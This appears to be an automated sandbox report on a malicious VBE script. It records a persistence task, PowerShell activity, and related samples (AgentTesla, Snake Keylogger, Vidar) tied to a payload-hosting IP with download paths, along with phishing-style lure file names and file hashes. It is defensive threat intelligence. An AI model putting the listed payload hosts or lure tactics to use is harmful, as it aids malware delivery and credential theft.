                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: Ref#150689.vbe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                08:46:03API Interceptor9x Sleep call for process: wscript.exe modified
                                                                08:46:12API Interceptor131x Sleep call for process: powershell.exe modified
                                                                08:46:28API Interceptor18x Sleep call for process: RegSvcs.exe modified
                                                                08:46:44API Interceptor2x Sleep call for process: wermgr.exe modified
                                                                14:46:06Task SchedulerRun new task: dirDChDJoZeRjid path: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                144.91.79.54INQ887721122.vbsGet hashmaliciousUnknownBrowse
                                                                • 144.91.79.54/1210/file
                                                                INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 144.91.79.54/1210/file
                                                                EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54/1210/file
                                                                Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54/0210/file
                                                                Ref_0120_0122.vbeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 144.91.79.54/2009/file
                                                                Ref_0120_03_0015.vbeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 144.91.79.54/1509/file
                                                                Ref Cheque 705059.vbeGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54/1509/file
                                                                original shipping documents.jsGet hashmaliciousUnknownBrowse
                                                                • 144.91.79.54/1109/file
                                                                REF DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54/1109/file
                                                                original shipping documents.jsGet hashmaliciousUnknownBrowse
                                                                • 144.91.79.54/1109/file
                                                                104.26.13.205file.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                • api.ipify.org/
                                                                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                • api.ipify.org/
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                • api.ipify.org/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                api.ipify.orgPO FOR CONNECTOR WITH TERMINAL.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                • 104.26.13.205
                                                                PO 0039499059996600 dtated 10222024.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 172.67.74.152
                                                                Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                • 104.26.13.205
                                                                d600758023374f78d58acafbcaf94af66ad203b28e22a.exeGet hashmaliciousQuasarBrowse
                                                                • 172.67.74.152
                                                                RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                • 104.26.12.205
                                                                mbbkel3.cmdGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                570ZenR882.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.12.205
                                                                sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 104.21.53.8
                                                                SecuriteInfo.com.Win32.Malware-gen.5541.4493.exeGet hashmaliciousBabadedaBrowse
                                                                • 188.114.97.3
                                                                Phoenix Service Tool V5.6.exeGet hashmaliciousUnknownBrowse
                                                                • 104.21.4.246
                                                                z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                https://1drv.ms/o/c/14c2aef4e2cd9199/EmKMpCkEfbpDs04MuZdva6IBilCqbzQYZtfiLbdaioNL0w?e=E2gYSOGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                Rechnung 22. Okt. 2024.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                https://eu-chervongroup.powerappsportalsecurefiles.xyz/Get hashmaliciousHtmlDropperBrowse
                                                                • 104.21.79.34
                                                                https://eu-chervongroup.powerappsportalsecurefiles.xyz/Get hashmaliciousHtmlDropperBrowse
                                                                • 104.18.95.41
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 104.21.53.8
                                                                VIVIDHOSTINGUSarm5.elfGet hashmaliciousUnknownBrowse
                                                                • 68.64.140.119
                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                • 216.157.141.60
                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                • 206.40.174.18
                                                                Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.254.34.31
                                                                EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                                • 162.254.34.31
                                                                Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.254.34.31
                                                                d4OrW9atV2.exeGet hashmaliciousFormBookBrowse
                                                                • 162.254.32.121
                                                                2UngC9fiGa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 63.246.132.200
                                                                Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 162.254.34.31
                                                                kkk.exeGet hashmaliciousFormBookBrowse
                                                                • 162.254.32.121
                                                                CONTABODEl6G93s9XLN.elfGet hashmaliciousMiraiBrowse
                                                                • 95.212.120.200
                                                                r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 161.97.168.245
                                                                https://iplogger.ru/250925Get hashmaliciousUnknownBrowse
                                                                • 173.249.62.84
                                                                890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                • 161.97.168.245
                                                                INQ887721122.vbsGet hashmaliciousUnknownBrowse
                                                                • 144.91.79.54
                                                                INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 144.91.79.54
                                                                Purchase Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 161.97.124.96
                                                                EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54
                                                                AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                • 161.97.168.245
                                                                Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                                                • 144.91.79.54

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eMEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 104.26.13.205
                                                                SecuriteInfo.com.Win32.Malware-gen.5541.4493.exeGet hashmaliciousBabadedaBrowse
                                                                • 104.26.13.205
                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                https://u.to/YaL0IAGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                https://warriorplus.com/o2/a/jxwtscv/0Get hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                • 104.26.13.205
                                                                LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 104.26.13.205
                                                                Quotation_final_buy_order_list_2024_po_nos_ART125673211020240000000000024.batGet hashmaliciousGuLoaderBrowse
                                                                • 104.26.13.205
                                                                TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 104.26.13.205
                                                                REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_6dcd90a0cfadcd56d98897fd4ad3469a57ab5cb_00000000_25500876-a34d-47e4-bb20-4e5a6be1c385\Report.wer

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):0.5201198159915306
                                                                Encrypted:false
                                                                SSDEEP:96:soF7cp0nj2rxYid67nRH3Uje0e3e/3hosM1QXIGZAX/d5FMT2SlPkpXmTA2f/VX7:hNj2mG67nR30hHxAzuiFsZ24lO8r
                                                                MD5:B2770F2F1F7D08A2D9AE6581C5034AAC
                                                                SHA1:DD956BE9E2BCB699FBB265C44EAFC993E29005D8
                                                                SHA-256:DA5456695CB1E363568C289630AF46E208BD5312E0E86D6B2AC556A7F0CC58E7
                                                                SHA-512:D50A2FFF2EA237619378FC0DEF7A2A05B7B25B57B7DAD15430CDEF9FF3479E8BC2221F782FF909AA722F7440C2DC58CFBD7E6E7714533523D6B4AEBF9B898CF4
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.0.7.4.9.3.1.7.4.8.4.6.2.6.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.0.7.4.7.8.7.8.6.8.2.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.5.0.0.8.7.6.-.a.3.4.d.-.4.7.e.4.-.b.b.2.0.-.4.e.5.a.6.b.e.1.c.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.4.4.-.0.0.0.1.-.0.0.1.4.-.3.0.3.d.-.a.4.6.6.8.0.2.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_bcb8d328-dfa3-4531-aae7-c2ccd8044f2a\Report.wer

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):0.5345553664920891
                                                                Encrypted:false
                                                                SSDEEP:96:0nFxjGrxYid6cRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTArnf/VXT5NHn:iHGmG6cR30wAAzuiFbZ24lO8
                                                                MD5:18C88BB7D9DD3C12D8EB72339F96D5C2
                                                                SHA1:AE5C8543503D4DE652043D177EE943FDADFD452F
                                                                SHA-256:1F27DB385D4FC3CB520505BE08E40934324F2928B886487C6A3E59FA8C1CA347
                                                                SHA-512:185D99893BCC87B25F6B1FC7399C96E31416068411830E2E8345AB0C6EB45EDF53796352F4292984E10A36A17355F80B3F81EA1B24680E1E893A193881FE37C6
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.0.7.5.1.1.5.5.7.7.0.1.7.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.0.7.4.7.8.7.6.8.9.6.1.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.b.8.d.3.2.8.-.d.f.a.3.-.4.5.3.1.-.a.a.e.7.-.c.2.c.c.d.8.0.4.4.f.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.4.-.0.0.0.1.-.0.0.1.4.-.c.5.5.8.-.4.a.5.d.8.0.2.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA82D.tmp.WERInternalMetadata.xml

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):7418
                                                                Entropy (8bit):3.6853919664549597
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJURdjVDBO6YSZ2XbGgmftqBppZm:R6lXJgpDI6Y826gmftq+
                                                                MD5:808E3E253D3C68C96AEB3F91791F8AEE
                                                                SHA1:635F27D7FD80AD740B869E86372ECFD92A4DAD12
                                                                SHA-256:0C367DC938849B0739F2083FA224A7D3CB52B481F1B6299087F7617FC2D4E384
                                                                SHA-512:7E779D0F89BBCBC5E118C680B6C60FD193B0CDDA04A4EE0085A567585044DF88F5151F1A6DDB67B9623C42F3881D0073FD60124FA34B992BACD2A8320AF3A239
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.4.<./.P.i.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA89B.tmp.xml

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4899
                                                                Entropy (8bit):4.569460746123698
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsfJg771I9xWWpW8VYlPYm8M4JFKlnOtSFvIyq8vT0OtN/ytfmd:uIjfBI7G37VtJFKlnpIWT0k/ufmd
                                                                MD5:FB4587E92414F27E5AE2B5CA52118CD0
                                                                SHA1:C0A3BC91F696377197A18433AF15DE9AA12667EE
                                                                SHA-256:BF6146081042E9E0A47792352CC336D0592434011910464E22BF515F2808E7EB
                                                                SHA-512:02428DD097C8D4F0267B1578ABB6C38E95929292760BE7C0E16F44402BE441C33E1E75DE0E985539AA631C8C84C07313BAAC093F95364AC04198574CC2BF9D2D
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="554629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8F8.tmp.WERInternalMetadata.xml

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):7228
                                                                Entropy (8bit):3.6849038638877993
                                                                Encrypted:false
                                                                SSDEEP:192:R6l7wVeJQk0Cif6YSh2XbGgmftvcBppRZm:R6lXJQfCif6Yk26gmft0k
                                                                MD5:C7DF7B6821B2C3C306CA481DFBABA1D7
                                                                SHA1:6624ADFB61F9653165AD7D4339A7CE55553FB9D7
                                                                SHA-256:5339817CC94F9E1C8418272E811D54E0FACD97E6D58DAB901086594CEDEBB710
                                                                SHA-512:EAC5CE2AAF61782F7C8E0C2C314FF3D784BD6331B0EAD520111D971BF75D4E391AE74CD1E921CFB67098FF783CBF98BCE9D9D1C9B60BF65B7FFAFCF0057C61DE
                                                                Malicious:false
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.7.6.<./.P.i.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA957.tmp.xml

                                                                Download File
                                                                Process:C:\Windows\System32\wermgr.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4711
                                                                Entropy (8bit):4.509051390600491
                                                                Encrypted:false
                                                                SSDEEP:96:uIjfBI7G37VdJFKl0F3DFt28WTnF3DFF/ufPd:uIlYG37x4EwVfufF
                                                                MD5:FDA66F5903A1D4BE4B4C00AADCD61D45
                                                                SHA1:8FBBDBD48885F9A3DA6029A816DBC4744D3B9D3E
                                                                SHA-256:6D473CEE9A6B517AB08FAC51567AF2AEEAAFF12424187DBC9427DEF6457F54B5
                                                                SHA-512:23A6A44C9670616B76B4CB22FE827EAA3FE8E2872E494D5225FEC30A0BE0DFABC2763ECA236B9BEF520C679EF3A8B0996C9F41948425FC2BFA2D33547CA775AC
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="554629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):11887
                                                                Entropy (8bit):4.901437212034066
                                                                Encrypted:false
                                                                SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                                MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                                SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                                SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                                SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):3260
                                                                Entropy (8bit):5.402789045006677
                                                                Encrypted:false
                                                                SSDEEP:96:vkU1zlHyIFKL2O9qrh7Kf+2J5Eo9AdrxwF:vz1yt2jrAVLL2a
                                                                MD5:992E42D1FA15F73BDD0184387A0F8CE7
                                                                SHA1:4C1D9E270A198B72ABB50525895F491732C6BB13
                                                                SHA-256:31B2DD018BFE02C0B5A2F2871C0C385F5F9D33A8A31522E9F1DCF1C122BA9E6E
                                                                SHA-512:DEB26838E45C25ED33CA34CFB86FE69A5D0DDBFF2B29145DEDD1B7F54AF2629224674408A5C78D1239C273946AF895C228CF43E7A7A084C6CEC51572D88B51CE
                                                                Malicious:false
                                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..r.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4acxarwu.0v2.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ncbfysb.4g1.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
